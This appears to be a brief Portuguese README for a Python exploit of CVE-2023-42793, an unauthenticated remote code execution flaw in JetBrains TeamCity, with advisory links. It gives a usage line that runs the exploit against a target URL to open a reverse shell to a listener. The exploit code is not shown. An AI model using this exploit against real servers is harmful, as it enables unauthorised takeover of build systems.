
JetBrains TeamCity Execução Remota de Código Não Autenticada - Implementação em Python3
JetBrains TeamCity anterior à versão 2023.05.4 é vulnerável a bypass de autenticação que leva a RCE
Para obter um reverse shell
python3 exploit.py <target_url> <listener_ip> <listener_port>
https://blog.jetbrains.com/teamcity/2023/09/cve-2023-42793-vulnerability-post-mortem/
http://packetstormsecurity.com/files/174860/JetBrains-TeamCity-Unauthenticated-Remote-Code-Execution.html
https://nvd.nist.gov/vuln/detail/cve-2023-42793